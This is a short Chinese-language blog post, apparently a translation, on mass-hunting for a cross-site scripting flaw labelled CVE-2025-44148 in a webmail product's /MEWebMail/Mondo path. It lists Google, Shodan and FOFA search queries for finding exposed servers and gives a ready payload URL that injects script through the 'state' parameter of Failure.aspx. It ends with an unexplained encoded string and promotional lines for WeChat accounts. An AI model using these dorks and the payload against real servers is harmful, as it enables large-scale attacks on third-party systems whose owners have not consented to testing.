XSS大规模挖掘:CVE-2025-44148
Google + Shodan + FOFA + ZoomEye Dorking
作者:Abhirup Konwar
2025年8月24日
1️⃣ Google Dorking
inurl:/Mondo/lang/sys
然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。
/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22
(按回车或点击查看完整尺寸图片)
2️⃣ Shodan Dorking
(200+ 条结果)
http.html:"/MEWebMail/Mondo"
目标过滤
http.html:"/MEWebMail/Mondo" hostname:target.com
http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com
2个重要的切面分析:
- Domain
- ssl.cert.subject.cn
(按回车或点击查看完整尺寸图片)
3️⃣ FOFA Dorking
(2000+ 条结果)
body="/MEWebMail/Mondo"
(按回车或点击查看完整尺寸图片)
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
)
